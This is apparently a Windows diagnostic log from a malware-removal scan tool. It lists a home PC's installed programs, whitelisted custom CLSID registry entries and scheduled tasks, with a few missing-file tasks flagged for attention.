Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
Bounce Symphony (x32 Version: 2.2.0.95 - WildTangent) Hidden
Build-a-lot 2 (x32 Version: 2.2.0.95 - WildTangent) Hidden
Cake Mania (x32 Version: 2.2.0.95 - WildTangent) Hidden
Chuzzle Deluxe (x32 Version: 2.2.0.95 - WildTangent) Hidden
CyberLink DVD Suite Premium (HKLM-x32\...\InstallShield_{1FBF6C24-C1FD-4101-A42B-0C564F9E8E79}) (Version: 7.0.3210 - CyberLink Corp.)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Diner Dash 2 Restaurant Rescue (x32 Version: 2.2.0.95 - WildTangent) Hidden
Dokan Library 0.5.3 (HKLM-x32\...\DokanLibrary) (Version:  - )
Dora's World Adventure (x32 Version: 2.2.0.95 - WildTangent) Hidden
Dropbox (HKU\S-1-5-21-1355648730-1136835254-2900194302-1001\...\Dropbox) (Version: 13.4.21 - Dropbox, Inc.)
DVD Menu Pack for HP MediaSmart Video (HKLM-x32\...\InstallShield_{FB4BB287-37F9-4E27-9C4D-2D3882E08EFF}) (Version: 4.2.4412 - Hewlett-Packard)
DVD Menu Pack for HP MediaSmart Video (x32 Version: 4.2.4412 - Hewlett-Packard) Hidden
Elements 9 Organizer (x32 Version: 9.0 - Adobe Systems Incorporated) Hidden
Elements STI Installer (x32 Version: 1.0 - Adobe Systems Incorporated) Hidden
Elevated Installer (x32 Version: 4.0.15.0 - Garmin Ltd or its subsidiaries) Hidden
Escape Rosecliff Island (x32 Version: 2.2.0.95 - WildTangent) Hidden
Farm Frenzy (x32 Version: 2.2.0.95 - WildTangent) Hidden
FATE (x32 Version: 2.2.0.95 - WildTangent) Hidden
Final Drive Nitro (x32 Version: 2.2.0.95 - WildTangent) Hidden
Garmin BaseCamp (HKLM-x32\...\{36A0D446-B8E9-4753-BDFE-335F6F4DE59C}) (Version: 4.5.2 - Garmin Ltd or its subsidiaries)
Garmin Express (HKLM-x32\...\{50755d67-ae60-4e47-b3d6-ce44d01b5a95}) (Version: 4.0.15.0 - Garmin Ltd or its subsidiaries)
Garmin Express (x32 Version: 4.0.15.0 - Garmin Ltd or its subsidiaries) Hidden
Garmin Express Tray (x32 Version: 4.0.15.0 - Garmin Ltd or its subsidiaries) Hidden
Garmin USB Drivers (HKLM\...\{DC7720F2-98BE-41C1-B0A8-E391362E86B8}) (Version: 2.3.1.1 - Garmin Ltd or its subsidiaries)
Google Earth (HKLM-x32\...\{817750FA-EC6A-485D-9901-0683AE6FFDF1}) (Version: 7.1.5.1557 - Google)
Google Update Helper (x32 Version: 1.3.31.5 - Google Inc.) Hidden
GoPro (Version: 0.1.2733 - GoPro, Inc.) Hidden
GoPro for Desktop (HKLM-x32\...\{88734dc7-c200-4ad3-b29f-bb5e436cb30f}) (Version: 1.4.0.2733 - GoPro, Inc.)
GoPro Studio (x32 Version: 5.9.2733 - GoPro, Inc.) Hidden
Heroes of Hellas 2 - Olympia (x32 Version: 2.2.0.95 - WildTangent) Hidden
HP Games (HKLM-x32\...\WildTangent hp Master Uninstall) (Version: 1.0.1.5 - WildTangent)
HP MediaSmart DVD (HKLM-x32\...\InstallShield_{DCCAD079-F92C-44DA-B258-624FC6517A5A}) (Version: 4.2.4725 - Hewlett-Packard)
HP MediaSmart Music (HKLM-x32\...\InstallShield_{91A34181-9FAD-43AB-A35F-E7A8945B7E1C}) (Version: 4.2.4517 - Hewlett-Packard)
HP MediaSmart Photo (HKLM-x32\...\InstallShield_{6DAF8CDC-9B04-413B-A0F2-BCC13CF8A5BF}) (Version: 4.2.4513 - Hewlett-Packard)
HP MediaSmart SmartMenu (HKLM\...\{A40F60B1-F1E1-452E-96A5-FF97F9A2D102}) (Version: 3.1.2.4 - Hewlett-Packard)
HP MediaSmart Video (HKLM-x32\...\InstallShield_{D12E3E7F-1B13-4933-A915-16C7DD37A095}) (Version: 4.2.4522 - Hewlett-Packard)
HP MediaSmart/TouchSmart Netflix (HKLM-x32\...\{2EA3D6B2-157E-4112-A3AB-BF17E16661C3}) (Version: 1.0.4.0 - Hewlett-Packard)
HP MovieStore (HKLM-x32\...\{9008D736-35CA-40DB-A2BE-5F32D954E5AA}) (Version: 2.0.2 - Hewlett-Packard)
HP Odometer (HKLM-x32\...\{B8AC1A89-FFD1-4F97-8051-E505A160F562}) (Version: 2.10.0000 - Hewlett-Packard)
HP Remote Solution (HKLM-x32\...\HP Remote Solution) (Version: 1.1.14.0 - Hewlett-Packard)
HP Setup (HKLM-x32\...\{53469506-A37E-4314-A9D9-38724EC23A75}) (Version: 8.4.4400.3525 - Hewlett-Packard Company)
HP Setup Manager (HKLM-x32\...\{AE856388-AFAD-4753-81DF-D96B19D0A17C}) (Version: 1.0.12844.3519 - Hewlett-Packard Company)
HP Support Assistant (HKLM-x32\...\{EE202411-2C26-49E8-9784-1BC1DBF7DE96}) (Version: 7.0.39.15 - Hewlett-Packard Company)
HP Support Information (HKLM-x32\...\{7F2A11F4-EAE8-4325-83EC-E3E99F85169E}) (Version: 10.1.1000 - Hewlett-Packard)
HP Update (HKLM-x32\...\{DE77FE3F-A33D-499A-87AD-5FC406617B40}) (Version: 5.002.003.003 - Hewlett-Packard)
HP Vision Hardware Diagnostics (HKLM\...\{D79A02E9-6713-4335-9668-AAC7474C0C0E}) (Version: 2.1.6.0 - Hewlett-Packard)
Hulu Desktop (HKU\S-1-5-21-1355648730-1136835254-2900194302-1001\...\HuluDesktop) (Version: 0.9.13 - Hulu LLC)
Internet TV for Windows Media Center (HKLM-x32\...\{9D318C86-AF4C-409F-A6AC-7183FF4CF424}) (Version: 4.2.2.0 - Microsoft Corporation)
iTunes (HKLM\...\{93F2A022-6C37-48B8-B241-FFABD9F60C30}) (Version: 12.1.2.27 - Apple Inc.)
Java 8 Update 40 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218040F0}) (Version: 8.0.400 - Oracle Corporation)
Jewel Quest Solitaire 2 (x32 Version: 2.2.0.95 - WildTangent) Hidden
Junk Mail filter update (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Kobo (HKLM-x32\...\Kobo) (Version: 1.6 - Kobo Inc.)
LabelPrint (HKLM-x32\...\InstallShield_{C59C179C-668D-49A9-B6EA-0121CCFC1243}) (Version: 2.5.3130 - CyberLink Corp.)
LabelPrint (x32 Version: 2.5.3130 - CyberLink Corp.) Hidden
LAV Filters 0.67 (HKLM-x32\...\lavfilters_is1) (Version: 0.67 - Hendrik Leppkes)
LightScribe System Software (HKLM-x32\...\{FD7F0DB8-0E96-4D64-AD4D-9B5A936AF2A8}) (Version: 1.18.20.1 - LightScribe)
MeAndMyDocs Upload Application (HKLM-x32\...\com.meandmydocs.Uploader.087FDEB77484A5AAF08430117BC2012EB6372029.1) (Version: v1 - UNKNOWN)
MeAndMyDocs Upload Application (x32 Version: 1 - UNKNOWN) Hidden
Microsoft Office Professional Plus 2010 (HKLM-x32\...\Office14.PROPLUSR) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50901.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x64 8.0.50727.4053 (HKLM\...\{B6E3757B-5E77-3915-866A-CCFC4B8D194C}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053 (HKLM-x32\...\{770657D0-A123-3C07-8E44-1C83EC895118}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{7f51bdb9-ee21-49ee-94d6-90afc321780e}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM-x32\...\{ce085a78-074e-4823-8dc1-8a721b94b76d}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Movie Theme Pack for HP MediaSmart Video (HKLM-x32\...\InstallShield_{3023EBDA-BF1B-4831-B347-E5018555F26E}) (Version: 4.2.4412 - Hewlett-Packard)
Movie Theme Pack for HP MediaSmart Video (x32 Version: 4.2.4412 - Hewlett-Packard) Hidden
Mozilla Firefox 49.0.2 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 49.0.2 (x86 en-US)) (Version: 49.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 49.0.2.6136 - Mozilla)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
MySQL Server 5.6 (HKLM\...\{56DA0CB5-ABD2-4318-BEAB-62FDBC9B12CC}) (Version: 5.6.10 - Oracle Corporation)
Mystery P.I. - The London Caper (x32 Version: 2.2.0.95 - WildTangent) Hidden
NetObjects Fusion Essentials (HKLM-x32\...\NetObjects Fusion Essentials) (Version:  - )
Norton 360 (HKLM-x32\...\N360) (Version: 22.8.0.50 - Symantec Corporation)
Norton Online Backup (HKLM-x32\...\{40A66DF6-22D3-44B5-A7D3-83B118A2C0DC}) (Version: 2.1.17869 - Symantec Corporation)
NVIDIA 3D Vision Controller Driver 352.65 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 352.65 - NVIDIA Corporation)
NVIDIA 3D Vision Driver 361.91 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 361.91 - NVIDIA Corporation)
NVIDIA Display Control Panel (HKLM\...\NVIDIA Display Control Panel) (Version: 6.14.12.5936 - NVIDIA Corporation)
NVIDIA GeForce Experience 2.9.1.35 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 2.9.1.35 - NVIDIA Corporation)
NVIDIA Graphics Driver 361.91 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 361.91 - NVIDIA Corporation)
NVIDIA HD Audio Driver 1.3.34.4 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.34.4 - NVIDIA Corporation)
NVIDIA PhysX System Software 9.15.0428 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.15.0428 - NVIDIA Corporation)
OpenAL (HKLM-x32\...\OpenAL) (Version:  - )
PDF Complete Special Edition (HKLM-x32\...\PDF Complete) (Version: 4.0.57 - PDF Complete, Inc)
Penguins! (x32 Version: 2.2.0.95 - WildTangent) Hidden
PhotoNow! (HKLM-x32\...\InstallShield_{D36DD326-7280-11D8-97C8-000129760CBE}) (Version: 1.1.7717 - CyberLink Corp.)
PhotoNow! (x32 Version: 1.1.7717 - CyberLink Corp.) Hidden
Picasa 3 (HKLM-x32\...\Picasa 3) (Version: 3.8 - Google, Inc.)
PictureMover (HKLM-x32\...\{264FE20A-757B-492a-B0C3-4009E2997D8A}) (Version: 3.5.0.33 - Hewlett-Packard Company)
Plants vs. Zombies (x32 Version: 2.2.0.95 - WildTangent) Hidden
PlayReady PC Runtime amd64 (HKLM\...\{BCA9334F-B6C9-4F65-9A73-AC5A329A4D04}) (Version: 1.3.0 - Microsoft Corporation)
PlayReady PC Runtime x86 (HKLM-x32\...\{CCA5EAAD-92F4-4B7A-B5EE-14294C66AB61}) (Version: 1.3.0 - Microsoft Corporation)
Poker Superstars III (x32 Version: 2.2.0.95 - WildTangent) Hidden
Polar Bowler (x32 Version: 2.2.0.95 - WildTangent) Hidden
Polar Golfer (x32 Version: 2.2.0.95 - WildTangent) Hidden
Power2Go (HKLM-x32\...\InstallShield_{40BF1E83-20EB-11D8-97C5-0009C5020658}) (Version: 6.1.4329 - CyberLink Corp.)
Power2Go (x32 Version: 6.1.4329 - CyberLink Corp.) Hidden
PowerDirector (HKLM-x32\...\InstallShield_{CB099890-1D5F-11D5-9EA9-0050BAE317E1}) (Version: 8.0.3129 - CyberLink Corp.)
PowerDirector (x32 Version: 8.0.3129 - CyberLink Corp.) Hidden
PressReader (HKLM-x32\...\{912CED74-88D3-4C5B-ACB0-13231864975E}) (Version: 5.10.1102.0 -  NewspaperDirect Inc.)
QuickTime 7 (HKLM-x32\...\{3D2CBC2C-65D4-4463-87AB-BB2C859C1F3E}) (Version: 7.76.80.95 - Apple Inc.)
RAIDXpert (HKLM-x32\...\InstallShield_{8B76B8E9-F773-4B75-A08C-120079EB765E}) (Version: 3.2.1540.10 - AMD)
RAIDXpert (x32 Version: 3.2.1540.10 - AMD) Hidden
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7535 - Realtek Semiconductor Corp.)
Recovery Manager (x32 Version: 5.5.3219 - CyberLink Corp.) Hidden
RoxioNow Player (HKLM-x32\...\{0EDEB615-1A60-425E-8306-0E10519C7B55}) (Version: 1.9.5.101 - RoxioNow)
Samsung Kies3 (HKLM-x32\...\InstallShield_{88547073-C566-4895-9005-EBE98EA3F7C7}) (Version: 3.2.15072.2 - Samsung Electronics Co., Ltd.)
Samsung Kies3 (x32 Version: 3.2.15072.2 - Samsung Electronics Co., Ltd.) Hidden
Seagate Dashboard (HKLM-x32\...\{EA266F00-A8E7-43A0-8DED-FBFE3F076934}) (Version: 4.4.1902.0 - Seagate)
Seagate Manager Installer (HKLM-x32\...\InstallShield_{E6F019F1-DFB6-4853-A87D-6E31624755A9}) (Version: 2.02.0109 - Seagate)
Seagate Manager Installer (x32 Version: 2.02.0109 - Seagate) Hidden
Serif DrawPlus Starter Edition (HKLM-x32\...\{33311EA4-0ECA-4E7F-83E5-8A92CD760152}) (Version: 2.0.2.010 - Serif (Europe) Ltd)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32\...\{91140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUSR_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}) (Version:  - Microsoft)
SHIELD Streaming (Version: 4.1.0260 - NVIDIA Corporation) Hidden
SHIELD Wireless Controller Driver (Version: 2.9.1.35 - NVIDIA Corporation) Hidden
SketchUp 2014 (HKLM-x32\...\{F246092E-FA0B-47C8-9D3E-CF8C210293C8}) (Version: 14.1.1282 - Trimble Navigation Limited)
SketchUp 2015 (HKLM\...\{319CD380-1AAB-4CAD-BE1D-59189A780FA6}) (Version: 15.2.685 - Trimble Navigation Limited)
SketchUp 8 (HKLM-x32\...\{8EB62C87-AAA6-4850-A5BC-64155884B973}) (Version: 3.0.16846 - Trimble Navigation Limited)
Spotify (HKU\S-1-5-21-1355648730-1136835254-2900194302-1001\...\Spotify) (Version: 0.8.5.1356.gd1d40f3a - Spotify AB)
TurboTax 2012 (HKLM-x32\...\TurboTax 2012) (Version: 2012.0 - Intuit, Inc)
TurboTax 2013 (HKLM-x32\...\TurboTax 2013) (Version: 2013.0 - Intuit, Inc)
TurboTax 2014 (HKLM-x32\...\TurboTax 2014) (Version: 2014.0 - Intuit, Inc)
TurboTax 2015 (HKLM-x32\...\TurboTax 2015) (Version: 2015.0 - Intuit, Inc)
VFW_Codec32 (x32 Version: 0.1.160.0 - GoPro, Inc.) Hidden
VFW_Codec64 (Version: 0.1.160.0 - GoPro, Inc.) Hidden
Virtual Families (x32 Version: 2.2.0.95 - WildTangent) Hidden
Virtual Villagers 4 - The Tree of Life (x32 Version: 2.2.0.95 - WildTangent) Hidden
VLC media player 2.1.3 (HKLM-x32\...\VLC media player) (Version: 2.1.3 - VideoLAN)
VVMapping - Great Lakes Snowmobile & ORV GPS Maps v8.0.0 (HKLM-x32\...\VVMapping-Great_Lakes_SMORV v8.0.0_is1) (Version:  - )
VVMapping - Great Lakes Snowmobile & ORV GPS Maps v8.1.0 (HKLM-x32\...\VVMapping-Great_Lakes_SMORV v8.1.0_is1) (Version:  - )
VVMapping - Great Lakes Snowmobile & ORV GPS Maps v8.5.0 (HKLM-x32\...\VVMapping-Great_Lakes_SMORV v8.5.0_is1) (Version:  - )
VVMapping - Great Lakes Snowmobile & ORV GPS Maps v8.6.0 (HKLM-x32\...\VVMapping-Great_Lakes_SMORV v8.6.0_is1) (Version:  - )
VVMapping-SouthernMichigan - GPS Maps v1.02 (HKLM-x32\...\VVMapping-SouthernMichigan_is1) (Version:  - )
Wheel of Fortune 2 (x32 Version: 2.2.0.95 - WildTangent) Hidden
Windows Driver Package - Dynastream Innovations, Inc. ANT LibUSB Drivers (04/11/2012 1.2.40.201) (HKLM\...\F9D2A789F9CFF8CEC36B544F53877C80F1F73C46) (Version: 04/11/2012 1.2.40.201 - Dynastream Innovations, Inc.)
Windows Driver Package - Garmin (grmnusb) GARMIN Devices  (04/19/2012 2.3.1.0) (HKLM\...\98157A226B40B173301B0F53C8E98C47805D5152) (Version: 04/19/2012 2.3.1.0 - Garmin)
Windows Driver Package - Silicon Labs Software (DSI_SiUSBXp_3_1) USB  (02/06/2007 3.1) (HKLM\...\D1506E0025B5A3F9EB8270FE81C1EEDD9388B8A2) (Version: 02/06/2007 3.1 - Silicon Labs Software)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3502.0922 - Microsoft Corporation)
Windows Media Center Add-in for Flash (HKLM-x32\...\{E2D09AC2-4153-4817-AAEB-24F92A8BCE88}) (Version: 4.1.2.0 - Microsoft Corporation)
Windows Media Center Add-in for Silverlight (HKLM-x32\...\{0EDBEB2B-7C8D-42E6-8312-0F84394A3223}) (Version: 4.7.3.0 - Microsoft Corporation)
Zinio Reader 4 (HKLM-x32\...\ZinioReader4.9310D8F796442B71068C511E15D70529A702D19D.1) (Version: 4.0.3184 - Zinio LLC)
Zinio Reader 4 (x32 Version: 4.0.3184 - Zinio LLC) Hidden
Zuma Deluxe (x32 Version: 2.2.0.95 - WildTangent) Hidden

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-1355648730-1136835254-2900194302-1001_Classes\CLSID\{005A3A96-BAC4-4B0A-94EA-C0CE100EA736}\localserver32 -> C:\Users\Harold\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1355648730-1136835254-2900194302-1001_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\Harold\AppData\Local\Microsoft\OneDrive\17.3.6517.0809_1\FileCoAuth.exe (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1355648730-1136835254-2900194302-1001_Classes\CLSID\{ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C}\InprocServer32 -> C:\Users\Harold\AppData\Roaming\Dropbox\bin\DropboxExt64.1.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1355648730-1136835254-2900194302-1001_Classes\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Harold\AppData\Roaming\Dropbox\bin\DropboxExt64.1.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1355648730-1136835254-2900194302-1001_Classes\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Harold\AppData\Roaming\Dropbox\bin\DropboxExt64.1.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1355648730-1136835254-2900194302-1001_Classes\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Harold\AppData\Roaming\Dropbox\bin\DropboxExt64.1.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1355648730-1136835254-2900194302-1001_Classes\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Harold\AppData\Roaming\Dropbox\bin\DropboxExt64.1.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1355648730-1136835254-2900194302-1001_Classes\CLSID\{FB314EDD-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Harold\AppData\Roaming\Dropbox\bin\DropboxExt64.1.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1355648730-1136835254-2900194302-1001_Classes\CLSID\{FB314EDE-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Harold\AppData\Roaming\Dropbox\bin\DropboxExt64.1.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1355648730-1136835254-2900194302-1001_Classes\CLSID\{FB314EDF-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Harold\AppData\Roaming\Dropbox\bin\DropboxExt64.1.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1355648730-1136835254-2900194302-1001_Classes\CLSID\{FB314EE0-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Harold\AppData\Roaming\Dropbox\bin\DropboxExt64.1.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1355648730-1136835254-2900194302-1001_Classes\CLSID\{FB314EE1-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Harold\AppData\Roaming\Dropbox\bin\DropboxExt64.1.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1355648730-1136835254-2900194302-1001_Classes\CLSID\{FB314EE2-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Harold\AppData\Roaming\Dropbox\bin\DropboxExt64.1.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1355648730-1136835254-2900194302-1001_Classes\CLSID\{FBC9D74C-AF55-4309-9FB2-C426E071637F}\InprocServer32 -> C:\Users\Harold\AppData\Roaming\Dropbox\bin\DropboxExt64.1.0.dll (Dropbox, Inc.)

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {0160ED31-5220-41EC-8724-CBCFE2248FD0} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-10-29] (Adobe Systems Incorporated)
Task: {01C1C091-B946-4D37-8C08-55A22A140C66} - System32\Tasks\Norton 360\Norton Error Analyzer => C:\Program Files (x86)\Norton 360\Engine\22.8.0.50\SymErr.exe [2016-09-23] (Symantec Corporation)
Task: {01F2C80E-E979-43C8-AC1D-3BABF8D8A274} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-08-13] (Google Inc.)
Task: {0614E216-9586-4DC9-9417-9663E71FFA81} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscovery => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {09DD22EA-249F-4834-94E9-2F324E944E0D} - System32\Tasks\Microsoft\Windows\Media Center\PvrRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe
Task: {0E8551ED-005D-40C6-90E3-80D5843F8DBB} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW2 => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {182548B4-34C3-493B-9E25-80E7BECB6AEE} - System32\Tasks\{80D68447-CC1E-4AC0-8C98-D29AFA292270} => pcalua.exe -a C:\Users\Harold\Downloads\NOF-Essentials.exe -d "C:\Program Files (x86)\Mozilla Firefox"
Task: {22C8C8A8-23E6-448B-8E77-3211AED6E650} - System32\Tasks\Microsoft\Windows\Media Center\StartRecording => C:\WINDOWS\ehome\ehrec.exe
Task: {22FFE13E-C15D-4B3B-A16B-60A57C7B2132} - System32\Tasks\{87239E00-682D-4EAE-B5F4-625C0E465C4E} => C:\Program Files (x86)\NetObjects\NetObjects Fusion Essentials\Fusion.exe [2009-05-15] (NetObjects)
Task: {24CF2868-3518-4830-ADEB-81A5230BD173} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION
Task: {27C411B7-E322-486B-938E-48EF225CFC07} - System32\Tasks\Microsoft\Windows\Media Center\OCURDiscovery => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {2917EE86-583E-4CED-848E-79DC2A6287E0} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {2CDF6509-9A37-4B6F-8CF0-D07109B5CB92} - System32\Tasks\Remediation\AntimalwareMigrationTask => C:\Program Files\Common Files\AV\Norton 360\Upgrade.exe [2016-09-23] (Symantec Corporation)
Task: {2F0B2903-9F5B-4E96-8394-51698C1980DD} - System32\Tasks\Microsoft\Windows\Media Center\OCURActivate => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {34006911-CE15-4B85-9356-3B8566C49416} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2012-09-27] (Hewlett-Packard Company)
Task: {3691FF85-D708-409B-BE7A-284ADA2BCFB2} - System32\Tasks\Microsoft\Windows\Media Center\ConfigureInternetTimeService => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {392AAB2B-15F7-48B1-B07E-0BE480D834F6} - System32\Tasks\Microsoft\Windows\Media Center\PvrScheduleTask => C:\WINDOWS\ehome\mcupdate.exe
Task: {4174D0B1-D662-4442-BE05-E74FDA7AB687} - System32\Tasks\Microsoft\Windows\Media Center\MediaCenterRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe
Task: {426D89B7-22E3-4132-B434-C26049460A35} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION
Task: {48DC4AB3-C811-4ECB-9E3A-A6A6524B818A} - System32\Tasks\OneDrive Standalone Update Task => C:\Users\Harold\AppData\Local\Microsoft\OneDrive\17.3.6517.0809\OneDriveStandaloneUpdater.exe [2016-08-16] (Microsoft Corporation)
Task: {4CA6A15D-F7D4-4A5E-A459-02C3D7A918ED} - System32\Tasks\AdobeAAMUpdater-1.0-Family-HP-Harold => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2010-07-29] (Adobe Systems Incorporated)
Task: {503702D7-8726-42F3-A652-BB92440B76A9} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION
Task: {5B81FDF8-ED83-46EE-A37D-5B1873C6749A} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2016-10-16] (Microsoft Corporation)
